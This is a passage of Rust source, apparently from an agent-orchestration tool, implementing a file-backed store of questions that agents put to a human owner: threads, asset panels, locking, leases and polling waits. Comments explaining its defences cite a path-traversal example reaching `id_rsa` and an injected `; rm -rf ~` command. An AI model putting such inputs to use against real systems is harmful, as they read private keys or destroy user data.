896    /// exactly as it does when the question is first asked.
897    pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
898        match self.status {
899            QuestionStatus::Answered => bail!(
900                "question {} was already answered; replying now would not \
901                 reach anyone",
902                self.short()
903            ),
904            QuestionStatus::Abandoned => bail!(
905                "question {} was abandoned and the run behind it is gone",
906                self.short()
907            ),
908            QuestionStatus::Open => {}
909        }
910        let body = body.into();
911        if body.trim().is_empty() {
912            bail!("a reply to question {} cannot be empty", self.short());
913        }
914        // An action whose label is no longer offered could never fire.
915        self.actions.retain(|label, _| choices.contains(label));
916        self.choices = choices;
917        let unread = self.unread_from_owner().is_some();
918        self.thread.push(Turn {
919            who: Who::Agent,
920            body,
921            at: Timestamp::now(),
922            note: None,
923        });
924        // The agent has read everything up to its own reply - but only if
925        // nothing the owner said in the meantime is still unread. A second say
926        // that landed after the agent's last look must stay undelivered.
927        if !unread {
928            self.delivered_turns = self.thread.len();
929        }
930        Ok(())
931    }
932
933    /// What the owner said that the agent has not read yet, oldest first,
934    /// joined. `None` unless the question is open and such a turn exists.
935    ///
936    /// Not [`Question::waiting_on_agent`]: an agent's reply can land *after* a
937    /// second owner turn it never saw, which leaves the last turn the agent's
938    /// and the ball apparently back with the owner while a say is still unread.
939    pub fn unread_from_owner(&self) -> Option<String> {
940        if !self.status.open() {
941            return None;
942        }
943        let said = self.undelivered_owner_turns();
944        (!said.is_empty()).then(|| said.join("\n\n"))
945    }
946
947    /// Owner turns the agent has not been handed yet, oldest first, whatever
948    /// the question's status. [`Question::unread_from_owner`] adds the "still
949    /// open" guard the waiter and the deputy rely on; an answer being handed
950    /// over needs the says that came before it even though the question is
951    /// closed by then.
952    pub fn undelivered_owner_turns(&self) -> Vec<&str> {
953        let from = self.delivered_turns.min(self.thread.len());
954        self.thread[from..]
955            .iter()
956            .filter(|t| t.who == Who::Operator)
957            .map(|t| t.body.as_str())
958            .collect()
959    }
960
961    /// When the conversation last moved: the newest thread turn, or the asking
962    /// itself, in seconds. `magi ask --thread` re-arms `answer_timeout` on
963    /// every reply, so a deadline runs from here and not from `asked_at`.
964    pub fn last_activity(&self) -> i64 {
965        self.thread
966            .iter()
967            .map(|t| t.at.as_second())
968            .max()
969            .unwrap_or(0)
970            .max(self.asked_at.as_second())
971    }
972
973    /// Is the ball in the agent's court?
974    ///
975    /// True from the moment the owner speaks back until the agent's next
976    /// [`Question::reply`], and never on a fresh or an already-settled
977    /// question. [`QuestionStatus`] does not move for either side of this -
978    /// see [`Question::say`] - so this is the one place that state is
979    /// readable at all, which is why [`crate::web::QuestionView`] carries it
980    /// separately rather than asking the phone to infer it from the thread.
981    pub fn waiting_on_agent(&self) -> bool {
982        self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
983    }
984
985    /// Should a notification go out right now?
986    ///
987    /// Always, for the very first ask: [`Question::thread`] is still empty, so
988    /// there is no earlier operator turn to have already caught anyone's
989    /// attention. After that, only once [`REPLY_QUIET_WINDOW`] has passed
990    /// since the owner's own last word - see that constant for why the window
991    /// exists at all and why its length is not configurable.
992    fn should_notify(&self, now: Timestamp) -> bool {
993        let Some(last) = self
994            .thread
995            .iter()
996            .rev()
997            .find(|t| t.who == Who::Operator)
998            .map(|t| t.at)
999        else {
1000            return true;
1001        };
1002        now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
1003    }
1004}
1005
1006/// A question store on disk.
1007#[derive(Debug, Clone)]
1008pub struct Questions {
1009    root: PathBuf,
1010}
1011
1012impl Questions {
1013    /// The operator's questions, `<home>/questions`.
1014    pub fn open() -> Self {
1015        Self::at(crate::run::home().join("questions"))
1016    }
1017
1018    /// A store at an explicit root. Tests use this, which is why none of them
1019    /// need the operator's real home.
1020    pub fn at(root: PathBuf) -> Self {
1021        Self { root }
1022    }
1023
1024    /// Directory holding the question files.
1025    pub fn root(&self) -> &Path {
1026        &self.root
1027    }
1028
1029    /// Path for one question id.
1030    pub fn path_of(&self, id: &str) -> PathBuf {
1031        self.root.join(format!("{id}.json"))
1032    }
1033
1034    /// Directory holding one question's panel, `<root>/<id>.panel`.
1035    pub fn panel_dir(&self, id: &str) -> PathBuf {
1036        self.root.join(format!("{id}{PANEL_DIR}"))
1037    }
1038
1039    /// Store a panel: the html, plus `assets` copied in under their base
1040    /// names. Updates `q.panel` and `q.assets`; the caller then [`put`]s the
1041    /// question, or the record on disk will deny having a panel that exists.
1042    ///
1043    /// The assets are **copied, not referenced**. An agent authors its panel
1044    /// inside a candidate worktree and points at files there, and `magi fold`
1045    /// deletes those worktrees; a question is the permanent record of a
1046    /// decision the owner took, so a panel that referenced its own images
1047    /// would render as broken boxes exactly when someone went back to ask why
1048    /// the decision was made. Copying follows symlinks - [`std::fs::copy`]
1049    /// does, and so does the [`std::fs::metadata`] the size is measured with,
1050    /// so the bytes counted and the bytes written are the same target file's -
1051    /// which is the intent: storing a link would leave the panel pointing at
1052    /// the worktree again, one indirection further away.
1053    ///
1054    /// Everything that can be rejected is rejected before the first byte is
1055    /// written, and the panel is then assembled in a scratch directory and
1056    /// swapped in. So a refusal leaves the previous panel intact, and a
1057    /// success replaces it *wholesale* rather than merging: a re-asked
1058    /// question showing one attempt's diff next to another attempt's table
1059    /// would be a panel neither agent ever wrote.
1060    ///
1061    /// [`put`]: Questions::put
1062    pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
1063        if !valid_asset_name(&q.id) {
1064            bail!(
1065                "question id `{}` is not a name magi will build a panel path from",
1066                q.id
1067            );
1068        }
1069        if html.trim().is_empty() {
1070            bail!(
1071                "question {} was handed an empty panel; an empty frame reads to \
1072                 the owner as \"the agent had nothing to say\", which is a lie",
1073                q.short()
1074            );
1075        }
1076
1077        // Names, then sizes, then writing - in that order, so nothing below
1078        // can leave a partial panel on disk.
1079        let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
1080        for src in assets {
1081            let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
1082            if !valid_asset_name(name) {
1083                bail!(
1084                    "panel asset `{}` cannot be stored: a panel file name must \
1085                     match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
1086                    src.display()
1087                );
1088            }
1089            if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
1090                bail!(
1091                    "two panel assets are both named `{name}` - {} and {} - and \
1092                     the panel can only show one of them; rename one at the source",
1093                    first.display(),
1094                    src.display()
1095                );
1096            }
1097            named.push((name.to_owned(), src.as_path()));
1098        }
1099
1100        let mut total = html.len() as u64;
1101        for (_, src) in &named {
1102            let meta = std::fs::metadata(src)
1103                .with_context(|| format!("stat panel asset {}", src.display()))?;
1104            if !meta.is_file() {
1105                bail!(
1106                    "panel asset `{}` is not a file; a panel is html plus files \
1107                     copied beside it",
1108                    src.display()
1109                );
1110            }
1111            total = total.saturating_add(meta.len());
1112        }
1113        if total > PANEL_MAX_BYTES {
1114            bail!(
1115                "panel for question {} is {total} bytes, over magi's cap of \
1116                 {PANEL_MAX_BYTES} bytes; nothing was written",
1117                q.short()
1118            );
1119        }
1120
1121        let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
1122        let dir = self.panel_dir(&q.id);
1123        std::fs::create_dir_all(&self.root)
1124            .with_context(|| format!("create {}", self.root.display()))?;
1125        clear_dir(&tmp)?;
1126        std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
1127        if let Err(e) = fill_panel(&tmp, html, &named) {
1128            // A copy that dies halfway must not become the panel, and must not
1129            // leave scratch behind for the next call to inherit.
1130            let _ = std::fs::remove_dir_all(&tmp);
1131            return Err(e);
1132        }
1133        clear_dir(&dir)?;
1134        std::fs::rename(&tmp, &dir)
1135            .with_context(|| format!("move panel into {}", dir.display()))?;
1136
1137        q.panel = true;
1138        q.assets = named.into_iter().map(|(n, _)| n).collect();
1139        q.assets.sort_unstable();
1140        Ok(())
1141    }
1142
1143    /// The panel's html, or `None` when the question has no panel.
1144    ///
1145    /// `None` rather than an error for a missing panel because the caller is a
1146    /// web handler whose answer is 404 either way, and an unreadable panel is
1147    /// not a reason to fail the question it belongs to.
1148    pub fn panel_html(&self, id: &str) -> Option<String> {
1149        if !valid_asset_name(id) {
1150            return None;
1151        }
1152        std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
1153    }
1154
1155    /// One file from a panel. `Ok(None)` is "no such file"; `Err` is "that is
1156    /// not a name a panel file can have".
1157    ///
1158    /// Rejects a name failing [`valid_asset_name`] **before touching the
1159    /// filesystem**, which is the whole point of the second check: the name
1160    /// arrives from a URL, the directory is on disk where any process could
1161    /// have dropped a file, and `<root>/<id>.panel/../../id_rsa` is a path the
1162    /// operating system would resolve perfectly happily. The two callers'
1163    /// distinct outcomes - 400 for a name, 404 for a file - are why this is
1164    /// `Result<Option<_>>` rather than one flattened `Option`.
1165    pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
1166        if !valid_asset_name(name) {
1167            bail!(
1168                "`{name}` is not a panel file name; it must match \
1169                 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
1170            );
1171        }
1172        if !valid_asset_name(id) {
1173            return Ok(None);
1174        }
1175        let dir = self.panel_dir(id);
1176        if !dir.is_dir() {
1177            return Ok(None);
1178        }
1179        let path = dir.join(name);
1180        match std::fs::read(&path) {
1181            Ok(bytes) => Ok(Some(bytes)),
1182            Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
1183            Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
1184        }
1185    }
1186
1187    /// Delete a question's panel, and any scratch a killed [`put_panel`] left.
1188    ///
1189    /// Succeeds when there is nothing to delete, so a caller cleaning up does
1190    /// not have to know whether a panel was ever written. The question record
1191    /// is not touched: the caller clears `panel` and `assets` and `put`s it,
1192    /// in the same order as everywhere else here.
1193    ///
1194    /// [`put_panel`]: Questions::put_panel
1195    pub fn drop_panel(&self, id: &str) -> Result<()> {
1196        if !valid_asset_name(id) {
1197            bail!("question id `{id}` is not a name magi will build a panel path from");
1198        }
1199        clear_dir(&self.panel_dir(id))?;
1200        clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
1201    }
1202
1203    /// Path of the lease sidecar for one question id.
1204    pub fn lease_path(&self, id: &str) -> PathBuf {
1205        self.root.join(format!("{id}.lease"))
1206    }
1207
1208    /// The lease on a question, if a readable one exists.
1209    pub fn read_lease(&self, id: &str) -> Option<Lease> {
1210        let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
1211        serde_json::from_str(&body).ok()
1212    }
1213
1214    /// Say, as `kind`, that something is alive and waiting on this question.
1215    ///
1216    /// Best-effort: a beat that cannot be written is a `tracing::debug`, never
1217    /// a reason to abandon a wait - the worst it costs is the waiter deciding
1218    /// the holder is gone a little early, and that is what the delivery guard
1219    /// (the seat still being busy) is there for.
1220    pub fn beat(&self, id: &str, kind: WaiterKind) {
1221        let lease = Lease {
1222            kind,
1223            pid: std::process::id(),
1224            beat_at: Timestamp::now(),
1225        };
1226        let path = self.lease_path(id);
1227        let tmp = path.with_extension("lease.tmp");
1228        let written = std::fs::create_dir_all(&self.root)
1229            .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
1230            .and_then(|()| std::fs::rename(&tmp, &path));
1231        if let Err(e) = written {
1232            tracing::debug!("could not beat the lease on question {id}: {e}");
1233        }
1234    }
1235
1236    /// Remove the lease sidecar. Absent is fine.
1237    pub fn drop_lease(&self, id: &str) {
1238        let _ = std::fs::remove_file(self.lease_path(id));
1239    }
1240
1241    /// Read-modify-write one question under a short exclusive lock, so the
1242    /// waiter's bookkeeping, the asker's and the phone's `say` cannot overwrite
1243    /// each other with a copy that predates the others.
1244    ///
1245    /// [`Questions::put`] is an atomic *replace*, which protects a reader from
1246    /// a torn file and does nothing for two writers that both read the same
1247    /// version first. Everything that changes a question that can still be
1248    /// answered goes through here: `f` sees the current record, not one loaded
1249    /// earlier. A lock older than [`LOCK_STALE`] belongs to a writer that died
1250    /// mid-update and is broken.
1251    pub fn update<T>(
1252        &self,
1253        id: &str,
1254        f: impl FnOnce(&mut Question) -> Result<T>,
1255    ) -> Result<(Question, T)> {
1256        std::fs::create_dir_all(&self.root)
1257            .with_context(|| format!("create {}", self.root.display()))?;
1258        let lock = self.root.join(format!("{id}.lock"));
1259        let started = std::time::Instant::now();
1260        loop {
1261            match std::fs::OpenOptions::new()
1262                .write(true)
1263                .create_new(true)
1264                .open(&lock)
1265            {
1266                Ok(_) => break,
1267                Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
1268                    let stale = std::fs::metadata(&lock)
1269                        .and_then(|m| m.modified())
1270                        .ok()
1271                        .and_then(|t| t.elapsed().ok())
1272                        .is_some_and(|age| age > LOCK_STALE);
1273                    if stale {
1274                        let _ = std::fs::remove_file(&lock);
1275                    } else if started.elapsed() > LOCK_STALE {
1276                        bail!("could not lock question {id}");
1277                    } else {
1278                        std::thread::sleep(Duration::from_millis(15));
1279                    }
1280                }
1281                Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
1282            }
1283        }
1284        struct Unlock(PathBuf);
1285        impl Drop for Unlock {
1286            fn drop(&mut self) {
1287                let _ = std::fs::remove_file(&self.0);
1288            }
1289        }
1290        let _guard = Unlock(lock);
1291        let mut q = read_path(&self.path_of(id))?;
1292        let out = f(&mut q)?;
1293        self.put(&mut q)?;
1294        Ok((q, out))
1295    }
1296
1297    /// Write a question, atomically, so a process killed mid-write leaves the
1298    /// previous state readable rather than a truncated file that would strand
1299    /// the run waiting on it.
1300    pub fn put(&self, q: &mut Question) -> Result<()> {
1301        std::fs::create_dir_all(&self.root)
1302            .with_context(|| format!("create {}", self.root.display()))?;
1303        let body = serde_json::to_string_pretty(q).context("serialize question")?;
1304        let path = self.path_of(&q.id);
1305        let tmp = path.with_extension("json.tmp");
1306        let is_new = !path.exists();
1307        std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1308        std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1309        // A first write of an open question pages the operator, so a separate
1310        // notification about the same task or run is now a second page.
1311        if is_new
1312            && q.status.open()
1313            && q.node != crate::bump::NOTICE_NODE
1314            && let Some(home) = self.root.parent().filter(|p| !p.as_os_str().is_empty())
1315        {
1316            crate::notices::quiet_for(home, q);
1317        }
1318        Ok(())
1319    }
1320
1321    /// Load a question by id or unambiguous id prefix.
1322    pub fn get(&self, id: &str) -> Result<Question> {
1323        let resolved = self.resolve_id(id)?;
1324        read_path(&self.path_of(&resolved))
1325    }
1326
1327    /// Every question on disk: open first, then newest first.
1328    ///
1329    /// Open first because that ordering is the product - the list exists to
1330    /// show the operator what has stopped, and an answered question is history
1331    /// underneath it. Unreadable files are skipped rather than fatal: one
1332    /// corrupt question must not take the web UI down, and must certainly not
1333    /// hide the open question the operator was looking for.
1334    pub fn list(&self) -> Vec<Question> {
1335        let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1336            .into_iter()
1337            .flatten()
1338            .flatten()
1339            .map(|e| e.path())
1340            .filter(|p| p.extension().is_some_and(|x| x == "json"))
1341            .filter_map(|p| read_path(&p).ok())
1342            .collect();
1343        all.sort_unstable_by(|a, b| {
1344            let rank = |q: &Question| u8::from(!q.status.open());
1345            rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1346        });
1347        all
1348    }
1349
1350    /// Open questions belonging to one run, newest first.
1351    ///
1352    /// Used to decide whether a parked run can be resumed: while this is
1353    /// non-empty, nothing about the run has changed and no agent should be
1354    /// spawned for it.
1355    pub fn open_for(&self, run: &str) -> Vec<Question> {
1356        self.list()
1357            .into_iter()
1358            .filter(|q| q.status.open() && q.run == run)
1359            .collect()
1360    }
1361
1362    /// Abandon every open question belonging to a run, and report how many.
1363    ///
1364    /// Called when a run's record is deleted. The agent that asked died with
1365    /// the run, so there is nobody left to hand an answer to, and a question
1366    /// left open would keep asking the operator for a decision that can no
1367    /// longer be delivered - the phone showed exactly that: "auth.rs というファ
1368    /// イルが見つかりません" with two buttons, for a run whose directory had
1369    /// been gone for two hours.
1370    ///
1371    /// Abandoned rather than deleted, because [`Question::abandon`] already
1372    /// means "this can no longer be answered" and the record of having asked
1373    /// is worth keeping. Answered questions are left exactly as they are.
1374    pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1375        let mut abandoned = 0;
1376        for mut q in self.open_for(run) {
1377            q.abandon(why);
1378            self.put(&mut q)?;
1379            abandoned += 1;
1380        }
1381        Ok(abandoned)
1382    }
1383
1384    /// Abandon a run's open questions once `status` says the run is not
1385    /// coming back, worded with what it actually became.
1386    ///
1387    /// The run-deleted case above and this one are the same fact - nobody is
1388    /// left to read an answer - reached by two different doors. This is the
1389    /// one for a run that finished on its own: merged, reached `Ready` with
1390    /// nothing left to do, failed outright with no established point to
1391    /// resume from, or every candidate agreed, with evidence, that nothing
1392    /// belonged in the worktree. Those are exactly the statuses
1393    /// [`RunStatus::resumable`]
1394    /// excludes, and that is the line this draws too - deliberately not
1395    /// [`RunStatus::done`], which also counts `Blocked` and `Stalled` as
1396    /// over. Both of those can still be picked back up with the candidates,
1397    /// the review round and the seat sessions already on disk, so a question
1398    /// asked mid-round may yet get a real answer from a real resume, and
1399    /// folding it here would be exactly the mistake this function exists to
1400    /// avoid on the other side - answering back into a run that no longer
1401    /// exists to read it.
1402    ///
1403    /// A no-op, not an error, when `status` is still resumable or when there
1404    /// was nothing open to begin with - callers reach this from more than one
1405    /// place a run can settle, and a second call finding nothing left to
1406    /// abandon is the expected case, not a bug.
1407    pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1408        if status.resumable() {
1409            return Ok(0);
1410        }
1411        let why = format!(
1412            "run {run} {}, so nothing is waiting for this answer",
1413            status.as_str()
1414        );
1415        // A post-merge notice is the exception: it is filed *because* the run
1416        // merged, and no agent waits on it - it is a to-do for the owner, not
1417        // a question a dead seat asked. Abandoning it here would erase the
1418        // only alert the moment the run settles.
1419        let mut abandoned = 0;
1420        for mut q in self.open_for(run) {
1421            if q.node == crate::bump::NOTICE_NODE {
1422                continue;
1423            }
1424            q.abandon(&why);
1425            self.put(&mut q)?;
1426            abandoned += 1;
1427        }
1428        Ok(abandoned)
1429    }
1430
1431    /// Expand an id prefix to exactly one question id. The short id the phone
1432    /// and the reports show is a suffix, so that is accepted too.
1433    pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1434        if self.path_of(prefix).is_file() {
1435            return Ok(prefix.to_owned());
1436        }
1437        let hits: Vec<String> = self
1438            .list()
1439            .into_iter()
1440            .map(|q| q.id)
1441            .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1442            .collect();
1443        match hits.len() {
1444            1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1445            0 => bail!("no question matches `{prefix}`"),
1446            _ => bail!(
1447                "`{prefix}` matches {} questions: {}",
1448                hits.len(),
1449                hits.join(", ")
1450            ),
1451        }
1452    }
1453
1454    /// Newest modification time in the store, in milliseconds, for change
1455    /// detection. The web UI compares this instead of re-reading every
1456    /// question, so an idle phone on a slow link costs one `stat` per file.
1457    pub fn revision(&self) -> u64 {
1458        std::fs::read_dir(&self.root)
1459            .into_iter()
1460            .flatten()
1461            .flatten()
1462            .filter_map(|e| e.metadata().ok())
1463            .filter_map(|m| m.modified().ok())
1464            .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1465            .map(|d| d.as_millis() as u64)
1466            .max()
1467            .unwrap_or(0)
1468    }
1469
1470    /// How many questions are open, whichever side of the conversation is
1471    /// holding the ball right now. Ten turns of back and forth between the
1472    /// owner and the agent are still one open question - see
1473    /// [`Question::say`] - so this does not drop while a reply is in
1474    /// flight. [`Self::count_needs_owner`] is the number that does.
1475    pub fn count_open(&self) -> usize {
1476        self.list().iter().filter(|q| q.status.open()).count()
1477    }
1478
1479    /// How many open questions actually need the owner right now: open, and
1480    /// not [`Question::waiting_on_agent`].
1481    ///
1482    /// This is the number a notification channel owes - the ask bar, the nav
1483    /// badge, the document title - because those exist to say "something
1484    /// needs you", and a question sitting in `magi ask --thread` limbo does
1485    /// not. `count_open` stays as it is for [`Self::open_for`]'s callers,
1486    /// where a round trip must not look like the run resumed.
1487    pub fn count_needs_owner(&self) -> usize {
1488        self.list()
1489            .iter()
1490            .filter(|q| q.status.open() && !q.waiting_on_agent())
1491            .count()
1492    }
1493}
1494
1495/// How a wait over [`Question`] ended.
1496#[derive(Debug, Clone, PartialEq, Eq)]
1497pub enum Wait {
1498    /// The owner decided. Carries [`Question::resolution`].
1499    Answered(String),
1500    /// The owner spoke back without deciding - see [`Question::say`]. The
1501    /// question is still [`QuestionStatus::Open`] and carries no [`Answer`];
1502    /// the caller's move is to hand this text to the agent and let it call
1503    /// `magi ask --thread` to keep talking, not to treat it as a decision.
1504    Replied(String),
1505    /// This call's [`WAIT_SLICE`] ran out with the question still
1506    /// [`QuestionStatus::Open`] and nothing having happened - not the owner
1507    /// going quiet, the clock on *this process* running out. The question is
1508    /// untouched; the caller's move is `magi ask --wait <id>` in a fresh
1509    /// process, so the wait resumes before the shell tool that would have
1510    /// killed this one gets the chance.
1511    Pending,
1512    /// Nobody said anything before the deadline, or the question was closed
1513    /// out from under the wait with no decision recorded - a run deleted out
1514    /// from under it, most often. Either way [`QuestionStatus::Abandoned`] is
1515    /// now on disk.
1516    Abandoned,
1517}
1518
1519/// File a question and wait for the owner, polling the store.
1520///
1521/// The question is updated in place from disk whenever the wait ends, so the
1522/// caller can act on it without re-reading it. `timeout` is the question's
1523/// whole `answer_timeout` budget, but this call spends at most [`WAIT_SLICE`]
1524/// of it - see [`Wait::Pending`] for what happens to the rest.
1525pub async fn ask_and_wait(
1526    q: &mut Question,
1527    store: &Questions,
1528    notify: &config::Notify,
1529    timeout: Duration,
1530) -> Result<Wait> {
1531    wait_for_owner(q, store, notify, timeout, POLL).await
1532}
1533
1534/// Resume a wait already filed, without adding a turn or notifying again.
1535///
1536/// This is `magi ask --wait <id>`'s engine: the process that owned the
1537/// previous slice is dead (the tool that ran it killed it, or it simply
1538/// exited after reporting [`Wait::Pending`]), but the question on disk never
1539/// stopped being open, and the owner was already notified about it once. A
1540/// second notification for the same unanswered question would page the
1541/// owner every [`WAIT_SLICE`] for a question they have already seen - so,
1542/// unlike [`ask_and_wait`], this skips straight to polling.
1543///
1544/// `timeout` is **not** re-armed to a fresh `answer_timeout` here - the
1545/// caller computes it as what remains until [`Question::asked_at`] plus the
1546/// configured `answer_timeout`, so stacking `--wait` calls can only ever use
1547/// up the deadline the first ask set, never push it out further.
1548pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1549    wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1550}
1551
1552/// [`ask_and_wait`] with the poll interval injected.
1553///
1554/// Separate only so the tests can drive a whole wait in milliseconds instead of
1555/// sleeping through [`POLL`]; production has exactly one interval, and it is not
1556/// a knob the operator gets to tune.
1557async fn wait_for_owner(
1558    q: &mut Question,
1559    store: &Questions,
1560    cfg: &config::Notify,
1561    timeout: Duration,
1562    poll: Duration,
1563) -> Result<Wait> {
1564    // A question that is already on disk (a `--thread` reply just wrote it under
1565    // the lock) is left alone: this copy may predate an answer or say that
1566    // landed since, and writing it back would erase that.
1567    if !store.path_of(&q.id).is_file() {
1568        store.put(q).context("file the question")?;
1569    }
1570    if q.should_notify(Timestamp::now()) {
1571        if let Err(e) = notify(cfg, q).await {
1572            // A broken webhook is not a reason to throw away an implementation.
1573            // The question is already on disk and the web UI already shows it,
1574            // so the operator still has a way in; only the tap on the shoulder
1575            // is lost.
1576            tracing::warn!(
1577                "could not notify about question {}: {e:#} - the web UI is the \
1578                 only surface for it now",
1579                q.short()
1580            );
1581        }
1582    }
1583    tracing::info!(
1584        "question {} from {} is waiting for you: {}",
1585        q.short(),
1586        q.seat,
1587        q.summary
1588    );
1589    wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1590}
1591
1592/// Take the wait as this process: beat the lease and note it on the record.
1593fn hold(store: &Questions, id: &str) {
1594    store.beat(id, WaiterKind::Asker);
1595    let took = store.update(id, |q| {
1596        if q.status.open() {
1597            q.waiter = Some(Waiter {
1598                kind: WaiterKind::Asker,
1599                since: Timestamp::now(),
1600            });
1601        }
1602        Ok(())
1603    });
1604    if let Err(e) = took {
1605        tracing::debug!("could not note the wait on question {id}: {e:#}");
1606    }
1607}
1608
1609/// Record that the agent has read everything so far, so the daemon waiter does
1610/// not resume a session to tell it what was already printed.
1611///
1612/// Callers must invoke this only **after** the word reached the agent's stdout:
1613/// marking first would let a tool timeout kill the process between the mark
1614/// and the print, and the waiter would then consider a word delivered that no
1615/// agent ever saw.
1616pub fn hand_over(store: &Questions, q: &mut Question) {
1617    let done = store.update(&q.id, |r| {
1618        r.delivered_turns = r.delivered_turns.max(q.thread.len());
1619        if r.status == QuestionStatus::Answered {
1620            r.answer_delivered = true;
1621        }
1622        r.waiter = None;
1623        Ok(())
1624    });
1625    match done {
1626        Ok((fresh, ())) => *q = fresh,
1627        Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1628    }
1629}
1630
1631/// What the agent is shown for an answer: the owner's says it has not read
1632/// yet, in order, then the answer. With no such say it is `answer` itself,
1633/// byte for byte.
1634pub fn answer_for_agent(q: &Question, answer: &str) -> String {
1635    let says = q.undelivered_owner_turns();
1636    if says.is_empty() {
1637        return answer.to_owned();
1638    }
1639    format!(
1640        "the owner also said, before answering:\n\n{}\n\nthe owner answered:\n\n{answer}",
1641        says.join("\n\n")
1642    )
1643}
1644
1645/// Print an answer (with any unread says before it) to `out`, flush, and only
1646/// then record the hand-over. A failed write marks nothing delivered.
1647pub fn deliver_answer(
1648    store: &Questions,
1649    q: &mut Question,
1650    answer: &str,
1651    out: &mut impl std::io::Write,
1652) -> std::io::Result<()> {
1653    writeln!(out, "{}", answer_for_agent(q, answer))?;
1654    out.flush()?;
1655    hand_over(store, q);
1656    Ok(())
1657}
1658
1659/// The polling loop shared by a fresh wait and a resumed one.
1660///
1661/// `timeout` is the budget left before the question's `answer_timeout`
1662/// truly runs out; `slice` bounds how much of that this one call spends
1663/// before handing control back. Landing on `slice` while `timeout` still has
1664/// budget left is [`Wait::Pending`] - the caller's move, not the owner's
1665/// silence. Landing on `timeout` itself - because it was no bigger than
1666/// `slice` to begin with - is the real thing, and abandons the question
1667/// exactly as a single unsliced wait always did.
1668async fn wait_loop(
1669    q: &mut Question,
1670    store: &Questions,
1671    timeout: Duration,
1672    slice: Duration,
1673    poll: Duration,
1674) -> Result<Wait> {
1675    // The owner may already have spoken back before this call ever started -
1676    // most often because they did so in the gap between an earlier call
1677    // reporting `Wait::Pending` and this one picking the wait back up with
1678    // `--wait`. That word must surface at once rather than sit unnoticed
1679    // until some *later* turn happens to change something: this call never
1680    // saw it get added, so nothing below would otherwise recognise it as
1681    // new. `last_word_awaiting_reply` reads the question's own record of
1682    // whose turn it is - see [`Question::waiting_on_agent`] - rather than a
1683    // turn count this call would have to have been there to capture.
1684    if let Some(said) = q.unread_from_owner() {
1685        return Ok(Wait::Replied(said));
1686    }
1687    hold(store, &q.id);
1688
1689    let bounded = timeout.min(slice);
1690    let is_the_real_deadline = bounded >= timeout;
1691    let deadline = tokio::time::Instant::now() + bounded;
1692    loop {
1693        let now = tokio::time::Instant::now();
1694        if now >= deadline {
1695            if !is_the_real_deadline {
1696                // The lease is left to age out on purpose: the caller is about
1697                // to run `magi ask --wait`, and that gap is what LEASE_TTL
1698                // covers.
1699                return Ok(Wait::Pending);
1700            }
1701            let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1702            // Re-checked on the record as it is now: the owner may have said
1703            // something in time since the last poll, and that word is handed
1704            // over, not abandoned.
1705            let (fresh, unread) = store
1706                .update(&q.id, |r| {
1707                    let unread = r.unread_from_owner();
1708                    if unread.is_none() {
1709                        r.abandon(&why);
1710                        r.waiter = None;
1711                    }
1712                    Ok(unread)
1713                })
1714                .context("record the abandoned question")?;
1715            *q = fresh;
1716            if let Some(said) = unread {
1717                return Ok(Wait::Replied(said));
1718            }
1719            tracing::warn!(
1720                "question {} went unanswered for {}s; the run parks and the \
1721                 question stays as the record of it",
1722                q.short(),
1723                timeout.as_secs()
1724            );
1725            return Ok(Wait::Abandoned);
1726        }
1727        tokio::time::sleep(poll.min(deadline - now)).await;
1728        store.beat(&q.id, WaiterKind::Asker);
1729        match store.get(&q.id) {
1730            Ok(fresh) if !fresh.status.open() => {
1731                // Whoever answered - the phone, `magi answer`, another daemon -
1732                // owns the record now, so adopt theirs wholesale rather than
1733                // merging into a copy that predates it.
1734                *q = fresh;
1735                return Ok(match q.resolution() {
1736                    Some(a) => Wait::Answered(a),
1737                    // Closed with no decision - abandoned elsewhere, most
1738                    // often by the run behind it being deleted mid-wait.
1739                    None => Wait::Abandoned,
1740                });
1741            }
1742            Ok(fresh) => {
1743                if let Some(said) = fresh.unread_from_owner() {
1744                    *q = fresh;
1745                    return Ok(Wait::Replied(said));
1746                }
1747                // Still open and not waiting on the agent - nothing this
1748                // wait cares about happened, so keep polling.
1749            }
1750            Err(e) => {
1751                // Mid-rename, or a file the operator is editing by hand.
1752                // Neither is a reason to abandon a question a human may still
1753                // answer, so keep polling until the deadline decides.
1754                tracing::debug!("could not re-read question {}: {e:#}", q.short());
1755            }
1756        }
1757    }
1758}
1759
1760/// Run the operator's notification command, if one is configured.
1761///
1762/// The command is argv, never a shell string, and the substitutions below are a
1763/// single pass over each argument: a summary containing `; rm -rf ~` is one
